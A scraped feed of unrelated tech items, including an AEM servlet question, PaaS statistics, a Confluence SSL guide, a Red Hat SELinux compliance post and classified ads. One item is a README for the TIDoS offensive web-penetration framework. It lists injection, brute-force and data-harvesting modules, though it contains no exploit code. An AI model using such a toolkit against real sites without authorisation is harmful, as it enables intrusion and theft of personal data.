I'm replacing the Felix annotations with OSGi DS annotations for my servlet, and I was able to build the project successfully. Once I deploy the bundle and hit the servlet path, I get a 404 response in the page, and in the error log I see this: org.apache.sling.engine.impl.SlingRequestProcessorImpl service: Resource /bin/custom/sample not found.

 

Things I have tried:

  • Tried with uber jar 6.3.0, 6.4.0 & 6.4.1
  • Tried with maven-bundle-plugin versions 3.2.0 & 3.3.0

 

 

I checked that my servlet is active and that I have the required entries in pom.xml. But when I compared the servlets that use the Felix and OSGi annotations, I could not see the Reference package in the OSGi servlet. Below are screenshots of the Felix and OSGi servlets. What else should I check? Appreciate your help.

 

 

Felix Servlet:

 

 

OSGI Servlet:

 

Regards,

Vijay
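For reference, a Declarative Services registration for a Sling servlet along the lines described above usually looks roughly like the sketch below. The class name and path are taken from the post; this depends on the Sling API and OSGi annotation jars being on the classpath, so it is a sketch rather than a standalone runnable program:

```java
import javax.servlet.Servlet;
import org.apache.sling.api.SlingHttpServletRequest;
import org.apache.sling.api.SlingHttpServletResponse;
import org.apache.sling.api.servlets.SlingSafeMethodsServlet;
import org.osgi.service.component.annotations.Component;

// With DS annotations the service type and the registration properties must
// be declared explicitly; a missing service = Servlet.class or a missing
// sling.servlet.paths property is a common cause of the 404 described above.
@Component(service = Servlet.class,
           property = { "sling.servlet.paths=/bin/custom/sample",
                        "sling.servlet.methods=GET" })
public class SampleServlet extends SlingSafeMethodsServlet {

    @Override
    protected void doGet(SlingHttpServletRequest request,
                         SlingHttpServletResponse response)
            throws java.io.IOException {
        response.getWriter().write("ok");
    }
}
```

If the component shows as active but the path still returns 404, another common thing to check is that /bin is listed among the execution paths allowed by the Sling Servlet/Script Resolver configuration.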


          Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018

Modern technologies do not stand still; they're constantly evolving. We put the current statistics on engines, application servers, databases and plug-ins under a magnifying glass, revealing which stacks are the most highly rated and the most actively used. Let's get acquainted with the detailed report based on the choices of Jelastic PaaS users.

Engines

The Jelastic cloud platform supports Java, PHP, Ruby, Node.js, Python, .NET and Go. According to the statistics, customers mainly choose two leading programming languages: the latest research shows PHP ahead with 58.3% of customer choice, while Java has 33.1%. The remaining languages are far less widespread (8.6% in total), but the situation can change.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
The statistical data gathered on the geographical spread of the engines shows that customers in Asia Pacific (APAC) mostly use Java for their applications. On the other hand, users in Europe, the Middle East and Africa (EMEA), as well as Latin America (LATAM), give priority to PHP, while in Northern America (NA) the percentages are approximately equal. It is noteworthy that Node.js is used roughly equally in all regions, while Ruby is more popular in Latin America.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
PHP Versions

PHP is considered one of the easiest-to-use server-side scripting languages. Most Jelastic PHP users run their projects on v7.1 (24.8%) and v5.6 (22.7%). Versions 7.0 and 5.4 also show high rates, at 17.4% and 15.6% respectively.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
JDK Versions

Java enables the development of secure, highly performed, and robust applications in heterogeneous, distributed networks. So that is why it’s one of the most widely used programming languages among enterprise projects.

On the graphic below you can see that the majority of Java environments in Jelastic PaaS were created with Java 8 (67.7%) and Java 7 (22.7%). Java 10 that was just recently released, already gained 1.8% and actively growing.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
PHP vs Java Geo-Distribution

Comparing PHP and Java, we can see that Asia Pacific countries commonly use Java, and Northern America likes both almost equally, while the other regions (EMEA, LATAM) prefer PHP.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Application Servers

Given that PHP and Java are the leading programming languages, it is no surprise that Apache and Tomcat are the most in-demand application servers: 46.5% of users installed Apache PHP to run their environments, and 27.3% chose Tomcat hosting. NGINX attracted 13% of customers, and the remaining servers (Node.js, GlassFish, WildFly, SpringBoot, NGINX Ruby, TomEE, Jetty, SmartFox Server, IIS, Apache Ruby, JBoss, Goland, and Raptor) got 3.2% in total.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
The geographical situation with the servers spread is similar to the engine usage: Tomcat is widely spread in North America, LATAM, and the Asia Pacific, while Apache is mostly popular in EMEA and LATAM countries.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Databases

Let's look at database server usage. The chart below shows that MySQL takes first place with 55.4% of installations; moreover, the number keeps growing, especially given how easy it is to install it with replication already pre-configured.

MariaDB (20.8%) and PostgreSQL (14.4%) hold second and third place respectively. Fourth goes to MongoDB with 4.5%, while the remaining database servers (Redis, Percona, Microsoft SQL, CouchDB, OrientDB, Neo4j) share the rest of users' favor.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Considering the distribution by regions, we can highlight that MySQL is popular in all parts of the world, especially in North America. MariaDB is in the tops in EMEA and keeps wide-spreading. PostgreSQL is more or less evenly distributed with the highest results in APAC.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Integrated Development Environments (IDE)

IDEs are used by development teams to build new software, applications, and services in a convenient way. Analyzing our statistics, we can identify three widely used IDEs that are integrated into Jelastic PaaS and can be installed easily:

NetBeans, Eclipse, and IntelliJ IDEA. As the picture below shows, more than half of our clients (50.5%) prefer to build their projects in NetBeans, a bit less than a third (22.6%) write their code in IDEA, and the rest (26.9%) choose Eclipse.
Software Stacks Statistics: Preferences of Jelastic PaaS Users in Q2 2018
Top Applications Installed in One Click

Jelastic provides a marketplace of ready-to-go applications, clusters, and add-ons built with its own packaging standard. Such pre-configured solutions are installed automatically and require minimal to no involvement in further management and support.

Here are the top 10 applications and add-ons most favored by Jelastic users:

WordPress Let’s Encrypt
          /net-sourceforge-MSSCodeFactory-CFBam-2.10.10027-ApacheV2-src.zip
none
          Running Confluence 6 over SSL or HTTPS - Creating or requesting an SSL certificate

Before you can enable HTTPS, you need a valid certificate. If you already have one, you can skip this step and go straight to step 2.

You can create a self-signed certificate, or obtain one from a trusted Certificate Authority.

If your team plans to use the Confluence Server mobile app, your certificate must be issued by a trusted Certificate Authority. You cannot use a self-signed certificate, a certificate from an untrusted authority, or a free CA.

Option 1: Create a self-signed certificate

Self-signed certificates are useful when you need encryption but do not need to verify the identity of the requesting website. In general, you would use a self-signed certificate in a test environment, or on your company's internal network.

Because the certificate is not signed by a trusted Certificate Authority (CA), users may see a warning that the site is untrusted and have to confirm an extra step before they can access it, usually only on their first visit. Users of the Confluence mobile app will not be able to access your Confluence site through a self-signed certificate.

Here we use Java's keytool utility, which is included in the JDK. If you are not comfortable with command-line tools, consider using the KeyStore Explorer tool instead.

To create a self-signed certificate with keytool:

  1. From the command line, run the command appropriate for your operating system:
    Windows
    "%JAVA_HOME%\bin\keytool" -genkeypair -keysize 2048 -alias tomcat -keyalg RSA -sigalg SHA256withRSA
    Linux (and MacOS)
    $JAVA_HOME/bin/keytool -genkeypair -keysize 2048 -alias tomcat -keyalg RSA -sigalg SHA256withRSA
  2. When prompted, create a password (password) for your certificate, the private key.
    • Use only digits and English letters. If you use special characters, Tomcat may throw errors.
    • Note down the password you created; you will need it in the next step.
    • The default password is 'changeit'.
  3. Follow the prompts to fill in the certificate details. These are used to construct the Distinguished Name (DN) of the X.500 entity.

    • First and last name: this is not your name; it is the Common Name (CN), for example 'confluence.example.com'. The CN must exactly match the domain name Confluence uses, otherwise Tomcat will not be able to use your signed certificate.
    • Organizational unit: the department or team the certificate is for, for example 'marketing'.
    • Organization: your company name, for example 'SeeSpaceEZ'.
    • City, State / province, country code: your company's location, for example Sydney, NSW, AU.
  4. The output will look like the following. Enter 'y' to confirm what you entered.
    CN=confluence.example.com, OU=Marketing, O=SeeSpaceEZ, L=Sydney, ST=NSW, C=AU
  5. When asked for the password (password) to use for 'tomcat', enter the password you created in step 2 (press Enter after typing it).
    • 'tomcat' is the alias you passed in the keytool command line; it is referenced here in the prompt.
    • Your keystore and your private key must have the same password. This is required by the Tomcat server.
  6. Your certificate is now ready to use; go to step 2 below.

Option 2: Use a certificate issued by a Certificate Authority (recommended)

In a production environment, you should use a certificate issued by a Certificate Authority (CA). The following content is adapted from the Tomcat documentation.

First you create a local certificate, then you generate a 'certificate signing request' (CSR) based on it. You submit the CSR to the CA provider of your choice for processing, and the CA sends you back the signed certificate based on the CSR.

  1. Use Java's keytool to create a local certificate (as described in step 1 above).
  2. From the command line, run the following command to create the CSR for the certificate created above.
    keytool -certreq -keyalg RSA -alias tomcat -file certreq.csr -keystore <MY_KEYSTORE_FILENAME>

    Replace <MY_KEYSTORE_FILENAME> with the path and file name of the .keystore created for your local certificate.

  3. Submit the generated certreq.csr file to the CA you wish to use.
    (info) Refer to your CA's documentation for how to do this.
  4. The CA will send you a signed certificate.
  5. Import the new certificate into your local keystore:
    keytool -importcert -alias tomcat -keystore <MY_KEYSTORE_FILENAME> -file <MY_CERTIFICATE_FILENAME>

    Some CAs may require you to install an intermediate certificate before installing your signed certificate. You should follow the documentation provided by your CA to complete the installation of your local certificate.

If you are using Verisign or GoDaddy and you receive an error message, you may need to export the certificate in PKCS12 format together with your private key.

  1. First, delete all the keys that were added to the keystore:
    keytool -delete -alias tomcat -keystore <MY_KEYSTORE_FILENAME>
  2. Then export in PKCS12 format:
    openssl pkcs12 -export -in <MY_CERTIFICATE_NAME> -inkey <MY_PRIVATEKEY_NAME> -out <MY_PKC12_KEYSTORE_NAME> -name tomcat -CAfile <MY_ROOTCERTIFICATE_NAME-alsoCalledBundleCertificateInGoDaddy> -caname root
  3. Then import the PKCS12 into a jks:
    keytool -importkeystore -deststorepass <MY_DESTINATIONSTORE_PASSWORD> -destkeypass <MY_DESTINATIONKEY_PASSWORD> -destkeystore <MY_KEYSTORE_FILENAME> -srckeystore <MY_PKC
 

https://www.cwiki.us/display/CONF6ZH/Running+Confluence+Over+SSL+or+HTTPS



Author: OSSEZTEC
Statement: This is an original article published on the ITeye website. Reproduction by any website without the author's written permission is strictly prohibited and will be pursued legally.







          Pickleball
(South 8th and Apache streets). Loaner paddles are available if you don’t have one.
          Redirect URL on Drupal installation
I have a Drupal installation with multiple subdomains on a Linux Server with Apache. I have a customer who changed their domain name and I need to make the change on our server. (Budget: $10 - $30 USD, Jobs: Apache, Drupal, Linux, PHP, System Admin)
           2011 TVS Apache RTR 12000 Kms
Price: ₹ 38,000, Model: Apache RTR, Year: 2011 , KM Driven: 12,000 km,
TVS Apache Black RTR 180 cc bike with less kilometres driven in very good running condition. Single First Owner. Clear Documents https://www.olx.in/item/2011-tvs-apache-rtr-12000-kms-ID1mBuGl.html
           TVS Apache RTR 44000 Kms 2010 year
Price: ₹ 24,000, Model: Apache RTR, Year: 2010 , KM Driven: 44,000 km,
TVS Apache RTR 44000 Kms 2010 year https://www.olx.in/item/tvs-apache-rtr-44000-kms-2010-year-ID1mB6PR.html
          Lead Java Developer - Colchester
Lead Java Developer - Colchester Salary: £80,000 Depending on Experience Key Skills: Masters or equivalent and Computer Science or maths or e-commerce, Agile, technical, object-oriented programming, software development/solutions, management This is an opportunity to work in Essex for an expanding company who are building onto their success as the leading global provider of outsourced business solutions within their initial industry sector. They have the hands-on experience of best practice and state-of-the-art technology to provide in-depth information to boost their customers` efficiency and profitability. The Lead Developer is responsible for the development of enterprise scale platforms used by the wider organisation and beyond. Working across various global projects simultaneously, you would work closely with the Global Development Director to architect software solutions. To be successful you must be able to think creatively with the ability to confidentially and clearly communicate complex technical information to colleagues. It is important that you have experience in a supervisory capacity and enjoy inspiring others. With 10+ years of experience in software development you would be heading up a team of application developers. Eligible to work in UK (NB Client is unable to provide sponsorship) To be successful you must be able to demonstrate your knowledge, skills and experience with: Maintaining and improving competence in java (JEE and swing), relational databases and web page construction (HTML, Javascript, CSS, AJAX, etc). Working within an Agile (Scrumban) development team at all stages of the development cycle. 
JEE technologies - EJB / Servlet / Spring MVC / JSP / FreeMarker etc
Server technologies - JBoss, Tomcat, Websphere, Glassfish, Geronimo, Apache, Linux
RDBMS - Oracle, SQL Server, Postgres, MYSQL
Integration technologies - JMS / Web Services (REST / SOAP)
Relational Mapping Tools - Hibernate / JPA / Toplink
Build Tools (Maven, Ant, Gradle)
Big Data technologies - NoSQL Databases (Mongo / CouchDB / Neo4j), Hadoop (HDFS / Spark / PIG / HIVE / Sqoop)
Analytics - Mahout, WEKA, Tableau, Clikview, Alteryx
Database programming - PLSQL / TSQL, Packages / Functions / Procedures
If you would like to be considered for this Lead Java Developer role please send your CV. Key Skills: Masters or equivalent and Computer Science or maths or e-commerce, Agile, technical, object-oriented programming, software development/solutions, management Important Information: We endeavour to process your personal data in a fair and transparent manner. In applying for this role, Additional Resources will be acting in your best interest and may contact you in relation to the role, either by email, phone or text message. For more information see our Privacy Policy on our website. It is important you are aware of your individual rights and the provisions the company has put in place to protect your data. If you would like further information on the policy or GDPR please contact us. Additional Resources are an Employment Business and an Employment Agency as defined within The Conduct of Employment Agencies & Employment Businesses Regulations 2003.
          XAMPP 5.6.37-0
An easy to install Apache distribution for Windows containing MySQL, PHP & Perl
          linux system administrator and ffmpeg,ffprobe, and handbrakecli
I am having an issue with ffprobe that says "Unable to load FFProbe". You need to fix the issue, and make sure you're familiar with Debian and ISPConfig. (Budget: $10 - $30 USD, Jobs: Apache, Debian, Linux, System Admin, Ubuntu)
          How SELinux helps mitigate risk while facilitating compliance

Many of our customers are required to meet a variety of regulatory requirements. Red Hat Enterprise Linux includes security technologies that help meet these requirements. Improving Linux security also benefits our layered products, such as Red Hat OpenShift Container Platform and Red Hat OpenStackⓇ Platform.

In this blog post, we use PCI-DSS to highlight some of the benefits of SELinux. Though there are many other security standards that affect our customers, we selected PCI-DSS based on a review of customer support cases, feedback, and general inquiries we received. The items we selected from this standard are also accepted industry practices, such as:

  • Limiting user access to data based on job roles.
  • Limiting access to system components.
  • Configuring software behavior, functions, and access.

What is SELinux?

SELinux is an advanced access control mechanism originally created by the United States National Security Agency. It was released under an open source license in 2000, and integrated into the Linux kernel in 2003. As part of the Linux kernel, it is built into the core of Red Hat Enterprise Linux. SELinux works by layering additional access controls on top of the traditional discretionary access controls that have been the basis of UNIX and Linux security for decades. SELinux access controls provide both increased granularity as well as a single security policy that is applied across the entire system and enforced by the RHEL kernel. SELinux enforces the security policy on applications bundled with Red Hat Enterprise Linux as well as any custom, third-party, and independent software vendor (ISV) applications. In addition to applications on the host system, SELinux access controls provide separation and controlled sharing between RHEL-hosted virtual machines and containers.

SELinux’s access controls are driven by a configurable security policy, which is loaded into the kernel at boot. The SELinux security policy functions as a whitelist for user and application behavior. The policy allows administrators and policy developers to isolate applications into specific SELinux domains that are tailored to the application’s permitted behaviors. Access to files, local interprocess communications (IPC) mechanisms, the network, and various other system resources can all be restricted on a per-domain basis. SELinux also allows the administrator to put individual SELinux domains, as well as the entire system, into permissive mode where SELinux-based access denials are logged, but the access is still permitted. This eases policy development and troubleshooting.
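As a quick illustration, an administrator can inspect the current SELinux mode and place a single domain into permissive mode with the standard policy tooling (a sketch; semanage ships in the policycoreutils packages, and exact package names vary by release):

```shell
# Report the current SELinux mode (Enforcing, Permissive, or Disabled)
# and a summary of the loaded policy.
getenforce
sestatus

# Put only the Apache domain into permissive mode for troubleshooting;
# denials for httpd_t are then logged but not blocked, while the rest
# of the system stays enforcing.
sudo semanage permissive -a httpd_t

# Review recent AVC (access vector cache) denial messages.
sudo ausearch -m avc -ts recent

# Remove the per-domain exception once the policy issue is resolved.
sudo semanage permissive -d httpd_t
```

Because permissive mode can be scoped to one domain, policy problems can be debugged without lowering the security posture of the whole host.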

While SELinux is an important part of Red Hat Enterprise Linux security capabilities, there are many other security technologies and widely accepted practices that should also be employed. Data encryption, malware scanning, firewalls, and other network security mechanisms remain an important part of an overall security strategy. SELinux is a way to augment existing security solutions, and is not a replacement for current security measures that may be in place.

Mapping to compliance requirements

With the above understanding of how SELinux can help reduce risk and harden a Red Hat Enterprise Linux system, let’s see how it maps to a few PCI-DSS compliance requirements. When reviewing PCI-DSS 3.2 requirements, it is easy to see how RHEL with SELinux can help address requirements that fall under the section Implement Strong Access Control Measures Requirement. Let’s look at some lesser-known requirements in sections two and three instead.

PCI-DSS requirement 2.2:

“[d]evelop configuration standards for all system components. Assure that these standards address all known security vulnerabilities and are consistent with industry-accepted system hardening standards.”

Given that, by default, it denies access to any resource rather than permits access, SELinux immediately meets industry-accepted system hardening standards, and may help mitigate certain classes of security vulnerabilities. It also helps meet the more granular requirements under 2.2 by ensuring a greater level of security restrictions and more fine-grained access control.

PCI-DSS requirement 3.6.7:

“Prevention of unauthorized substitution of cryptographic keys”

At a system-configuration level, SELinux can prevent unauthorized overwriting of files—even when a specific user or role would normally be authorized to write to the directory containing cryptographic keys.

SELinux can also help customers meet other well-known PCI-DSS 3.2 requirements by:
Limiting access to system components and cardholder data to only those individuals whose job requires such access. (meets 7.1.1 - 7.1.3)
Establishing an access control system(s) for systems components that restricts access based on a user’s need to know, and is set to ‘deny all’ unless specifically allowed. (meets 7.2.1 - 7.2.3)

Restricting malicious actor read, write, and pivoting

When SELinux is in enforcing mode, the default policy used in Red Hat Enterprise Linux is the targeted policy. In the default targeted policy, some applications run in a confined SELinux domain where SELinux policy restricts those applications to a particular set of behaviors. All other applications run in special unconfined domains; while they are still SELinux security domains, there is little to no restriction to their permitted behavior.

Almost every service that listens on a network is confined in RHEL, such as httpd and sshd. Also, most processes that run as the root user and perform tasks for users, such as the passwd utility, are confined. When a process is confined, it runs in its own domain. Depending on the SELinux policy configuration for a confined process, an attacker's access to resources, ability to pivot, read, and write, and the possible damage they can do may be limited.
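You can observe this separation directly on a running system; for example (a sketch using the -Z flags provided by ps and SELinux-enabled coreutils):

```shell
# List running processes with their SELinux domains; confined services
# run in dedicated domains such as httpd_t or sshd_t, while most user
# shells run unconfined under the default targeted policy.
ps -eZ | grep -E 'httpd|sshd'

# Files carry matching SELinux types; web content under /var/www/html
# is labeled httpd_sys_content_t by default.
ls -Z /var/www/html

# Show the SELinux context of your own shell.
id -Z
```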

We have listed below a few of the common processes and daemons that run confined by default in their own domain. If you have a question regarding a process that is not listed here, send your inquiry to Red Hat Customer Service.

  • dhcpd is the Dynamic Host Configuration Protocol (DHCP) daemon, used in Red Hat Enterprise Linux to dynamically deliver and configure Layer 3 TCP/IP details for clients.
  • smbd is a Samba server that provides file and print services between clients across various operating systems.
  • httpd (Apache HTTP Server) provides a web server.
  • Squid is a high-performance proxy caching server for web clients supporting FTP, Gopher, and HTTP data objects. It reduces bandwidth and improves response times by caching and reusing frequently requested web pages.
  • mysqld is a multi-user, multi-threaded SQL database server that consists of the MariaDB server daemon (mysqld) and many client programs and libraries.
  • PostgreSQL is an Object-Relational database management system (DBMS).
  • Postfix is an open-source Mail Transport Agent (MTA), which supports protocols like LDAP, SMTP AUTH (SASL), and TLS.

For more information on how the Red Hat portfolio can help customers with PCI-DSS compliance, review Red Hat’s 2015 paper on PCI and DSS compliance and our 2016-2017 blog series.

Vulnerabilities

SELinux can also help mitigate many risks posed from privilege escalation attacks. SELinux policy rules define how processes access files and other processes. If a process is compromised, the attacker can only access resources granted to it through the associated SELinux domain. Exploiting an application does not change what SELinux allows the process to access. For example, if the Apache HTTP Server is compromised, an attacker cannot use that process to read files in user home directories by default, unless a specific SELinux policy rule was added or configured to allow such access.
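For example, the policy booleans that govern Apache's access to home directory content default to off on Red Hat Enterprise Linux; a sketch of how an administrator would verify, and deliberately relax, that restriction:

```shell
# Both booleans default to 'off', so a compromised httpd process is
# denied read access to content in user home directories.
getsebool httpd_enable_homedirs httpd_read_user_content

# Only an administrator can deliberately relax that restriction;
# -P persists the change across reboots and policy reloads.
sudo setsebool -P httpd_enable_homedirs on
```

Because the restriction lives in the policy rather than the application, exploiting httpd does not change the answer: the compromised process stays inside httpd_t.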

Based on our review of data from the 2017 calendar year, we selected three vulnerabilities publicly released during that time which were mitigated by default Red Hat Enterprise Linux SELinux policies.

CVE-2016-9962 targeted containers, and it became public just 11 days into the new year. On Red Hat systems with SELinux enabled, the dangers of even privileged containers are mitigated. SELinux prevents container processes from accessing host content even if those container processes manage to gain access to the actual file descriptors. With SELinux in enforcing mode, enabling the deny_ptrace boolean in the default SELinux policy (which only affects the policy shipped by Fedora or Red Hat) lets customers:
- remove all ptrace access,
- confine otherwise unconfined domains, and
- retain the flexibility to disable it permanently or temporarily for troubleshooting.

CVE-2017-6074 addressed a flaw in the Datagram Congestion Control Protocol (DCCP). If exploited by a local, unprivileged user, the user could alter the kernel memory and escalate their privileges on the system. With SELinux enabled and using the default policies alone, this flaw is mitigated.

CVE-2017-7494 addressed a flaw in Samba. A malicious authenticated Samba client with write access to a Samba share could use this flaw to execute arbitrary code as root. When SELinux is enabled, the default policy prevents loading of modules from outside of Samba's module directories and therefore mitigates the flaw.

Red Hat and security

At Red Hat we believe that security is a mindset, not a feature. That’s why we work closely with upstream developers and communities to encourage secure coding practices, information sharing, and collaboration. We firmly believe the principles of open source software contribute to transparency and more secure products, benefiting customers and communities alike.

SELinux is shipped enabled by default in Red Hat Enterprise Linux. In addition to providing added security and mitigating a threat actor’s ability to pivot, SELinux also helps customers meet a variety of compliance standards requirements. And although the terms compliant and secure are not directly interchangeable, we understand that both are very important to our customers. We work continuously to support our products and help our customers achieve both business objectives.

For more information on Red Hat Product Security, visit the Product Security Center on the Red Hat Customer Portal. If you have vulnerability information you would like to share with us, please send an email to secalert@redhat.com.

Product

Red Hat Enterprise Linux

Category

Secure

Tags

selinux

Component

dhcp httpd mysql postfix postgresql samba squid

TIDoS Framework - The Offensive Web Application Penetration Testing Framework

TIDoS Framework is a comprehensive web-application audit framework. Let's keep this simple.

Highlights :-
The main highlights of this framework are:
  • TIDoS Framework now boasts more than a hundred modules.
  • A complete, versatile framework covering everything from Reconnaissance to Vulnerability Analysis.
  • Has 5 main phases, subdivided into 14 sub-phases consisting of a total of 104 modules.
  • Reconnaissance Phase has 48 modules of its own (including active and passive recon and information disclosure modules).
  • Scanning & Enumeration Phase has 15 modules (including port scans, WAF analysis, etc.)
  • Vulnerability Analysis Phase has 36 modules (including the most common vulnerabilities in action).
  • Exploits Castle has only 1 exploit (purely developmental).
  • And finally, Auxiliaries have 4 modules (under development).
  • All four phases each have an Auto-Awesome module which automates every module for you.
  • You just need the domain; leave everything else to this tool.
  • TIDoS has full verbose output support, so you'll know what's going on.
  • Fully user-friendly interactive environment.


Installation :
  • Clone the repository locally and navigate there:
git clone https://github.com/theinfecteddrake/tidos-framework.git
cd tidos-framework
  • Install the dependencies:
chmod +x install
./install


That's it! Now you are good to go. Let's run the tool:
tidos

Getting Started :-
TIDoS is made to be comprehensive and versatile. It is a highly flexible framework where you just have to select and use modules.
But before that, you need to set your own API KEYS for various OSINT purposes. To do so, open up API_KEYS.py under files/ directory and set your own keys and access tokens for SHODAN, CENSYS, FULL CONTACT, GOOGLE and WHATCMS. Public API KEYS and ACCESS TOKENS for SHODAN and WHATCMS have been provided with the TIDoS release itself. You can still add your own... no harm!
Finally, as the framework opens up, enter the website name, e.g. http://www.example.com, and let TIDoS lead you. That's it! It's as easy as that.
Recommended:
  • Follow the order of the tool (Run in a schematic way).
    Reconnaissance ➣ Scanning & Enumeration ➣ Vulnerability Analysis
To update this tool, use tidos_updater.py module under tools/ folder.

Flawless Features :-
TIDoS Framework presently supports the following (and is under active development):
  • Reconnaissance + OSINT
    • Passive Reconnaissance:
      • Nping Enumeration Via external API
      • WhoIS Lookup Domain info gathering
      • GeoIP Lookup Pinpoint physical location
      • DNS Configuration Lookup DNSDump
      • Subdomains Lookup Indexed ones
      • Reverse DNS Lookup Host Instances
      • Reverse IP Lookup Hosts on same server
      • Subnets Enumeration Class Based
      • Domain IP History IP Instances
      • Web Links Gatherer Indexed ones
      • Google Search Manual search
      • Google Dorking (multiple modules) Automated
      • Email to Domain Resolver Email WhoIs
      • Wayback Machine Lookups Find Backups
      • Breached Email Check Pwned Email Accounts
      • Enumeration via Google Groups Emails Only
      • Check Alias Availability Social Networks
      • Find PasteBin Posts Domain Based
      • LinkedIn Gathering Employees & Company
      • Google Plus Gathering Domain Profiles
      • Public Contact Info Scraping FULL CONTACT
      • Censys Intel Gathering Domain Based
      • Threat Intelligence Gathering Bad IPs
    • Active Reconnaissance
      • Ping Enumeration Advanced
      • CMS Detection (185+ CMSs supported) IMPROVED
      • Advanced Traceroute IMPROVED
      • robots.txt and sitemap.xml Checker
      • Grab HTTP Headers Live Capture
      • Find HTTP Methods Allowed via OPTIONS
      • Detect Server Type IMPROVED
      • Examine SSL Certificate Absolute
      • Apache Status Disclosure Checks File Based
      • WebDAV HTTP Enumeration PROPFIND & SEARCH
      • PHPInfo File Enumeration via Bruteforce
      • Comments Scraper Regex Based
      • Find Shared DNS Hosts Name Server Based
      • Alternate Sites Discovery User-Agent Based
      • Discover Interesting Files via Bruteforce
        • Common Backdoor Locations shells, etc.
        • Common Backup Locations .bak, .db, etc.
        • Common Password Locations .pgp, .skr, etc.
        • Common Proxy Path Configs. .pac, etc.
        • Common Dot Files .htaccess, .apache, etc
    • Information Disclosure
      • Credit Cards Disclosure If Plaintext
      • Email Harvester IMPROVED
      • Fatal Errors Enumeration Includes Full Path Disclosure
      • Internal IP Disclosure Signature Based
      • Phone Number Harvester Signature Based
      • Social Security Number Harvester US Ones
  • Scanning & Enumeration
    • Remote Server WAF Enumeration Generic 54 WAFs
    • Port Scanning Ingenious Modules
      • Simple Port Scanner via Socket Connections
      • TCP SYN Scan Highly reliable
      • TCP Connect Scan Highly Reliable
      • XMAS Flag Scan Reliable Only in LANs
      • Fin Flag Scan Reliable Only in LANs
      • Port Service Detector
    • Web Technology Enumeration Absolute
    • Operating System Fingerprinting IMPROVED
    • Banner Grabbing of Services via Open Ports
    • Interactive Scanning with NMap 16 preloaded modules
    • Enumeration Domain-Linked IPs Using CENSYS Database
    • Web and Links Crawlers
      • Depth 1 Indexed Uri Crawler
      • Depth 2 Single Page Crawler
      • Depth 3 Web Link Crawler
  • Vulnerability Analysis
    Web-Bugs & Server Misconfigurations
    • Insecure CORS Absolute
    • Same-Site Scripting Sub-domain based
    • Zone Transfer DNS Server based
    • Clickjacking
      • Frame-Busting Checks
      • X-FRAME-OPTIONS Header Checks
    • Security on Cookies
      • HTTPOnly Flag
      • Secure Flag
    • Cloudflare Misconfiguration Check
      • DNS Misconfiguration Checks
      • Online Database Lookup For Breaches
    • HTTP Strict Transport Security Usage
      • HTTPS Enabled but no HSTS
    • Domain Based Email Spoofing
      • Missing SPF Records
      • Missing DMARC Records
    • Host Header Injection
      • Port Based Over HTTP 80
      • X-Forwarded-For Header Injection
    • Security Headers Analysis Live Capture
    • Cross-Site Tracing HTTP TRACE Method
    • Session Fixation via Cookie Injection
    • Network Security Misconfig.
      • Checks for TELNET Enabled via Port 23
    Serious Web Vulnerabilities
    • File Inclusions
      • Local File Inclusion (LFI) Param based
      • Remote File Inclusion (RFI) IMPROVED
        • Parameter Based
        • Pre-loaded Path Based
    • OS Command Injection Linux & Windows (RCE)
    • Path Traversal (Sensitive Paths)
    • Cross-Site Request Forgery Absolute
    • SQL Injection
      • Error Based Injection
        • Cookie Value Based
        • Referer Value Based
        • User-Agent Value Based
        • Auto-gathering IMPROVED
      • Blind Based Injection Crafted Payloads
        • Cookie Value Based
        • Referer Value Based
        • User-Agent Value Based
        • Auto-gathering IMPROVED
    • LDAP Injection Parameter Based
    • HTML Injection Parameter Based
    • Bash Command Injection ShellShock
    • XPATH Injection Parameter Based
    • Cross-Site Scripting IMPROVED
      • Cookie Value Based
      • Referer Value Based
      • User-Agent Value Based
      • Parameter Value Based Manual
    • Unvalidated URL Forwards Open Redirect
    • PHP Code Injection Windows + Linux
    • HTTP Response Splitting CRLF Injection
      • User-Agent Value Based
      • Parameter value Based Manual
    • Sub-domain Takeover 50+ Services
      • Single Sub-domain Manual
      • All Subdomains Automated
    Other
    • PlainText Protocol Default Credential Bruteforce
      • FTP Protocol Bruteforce
      • SSH Protocol Bruteforce
      • POP 2/3 Protocol Bruteforce
      • SQL Protocol Bruteforce
      • XMPP Protocol Bruteforce
      • SMTP Protocol Bruteforce
      • TELNET Protocol Bruteforce
  • Auxiliary Modules
    • Hash Generator MD5, SHA1, SHA256, SHA512
    • String & Payload Encoder 7 Categories
    • Forensic Image Analysis Metadata Extraction
    • Web HoneyPot Probability ShodanLabs HoneyScore
  • Exploitation purely developmental
    • ShellShock

Other Tools:
  • net_info.py - Displays information about your network. Located under tools/.
  • tidos_updater.py - Updates the framework to the latest release via signature matching. Located under tools/.

TIDoS In Action:

Version:
v1.6 [latest release] [#stable]

Upcoming:
There are some bruteforce modules to be added, as well as:
  • Some more Enumeration & Information Disclosure modules.
  • Lots more OSINT & stuff (let that be a suspense).
  • More Auxiliary Modules.
  • Some exploits are being worked on, too.

Known Bugs:
This version of TIDoS is purely developmental, though presently stable. There are bugs in resolving the [99] Back option at various end-points, which results in blind fall-backs. Though I have added global exception handling, there may still be bugs out there. TIDoS also needs to develop more on logging all info displayed on the screen (help needed).

Disclaimer:
TIDoS is provided as an offensive web application audit framework. It has built-in modules which can reveal potential misconfigurations and vulnerabilities in web applications that could possibly be exploited maliciously.
THEREFORE, I AM NOT EXCLUSIVELY RESPONSIBLE FOR ANY MISUSE OF THIS TOOLKIT.


Download TIDoS-Framework

2 Houston cos. join forces in $3.5B midstream firm

Two Houston-based companies have partnered to create a new midstream firm.  Apache Corp. (NYSE: APA) and Kayne Anderson Acquisition Corp. (Nasdaq: KAAC, KAACU, KAACW) will form a new company called Altus Midstream Co. that’s expected to have a market capitalization of $3.5 billion at formation, based on 354.4 million common shares outstanding at a $10 share…



Protecting internal applications with a SAML-aware reverse-proxy (a tutorial)

My employer wholly embraces the coffee-shop model for employee access, which can induce a bit of stress if your job is to protect company resources.  Historically, we have had to support some applications that:

  1. Don’t support SAML (or whatever flavor of federation you prefer)
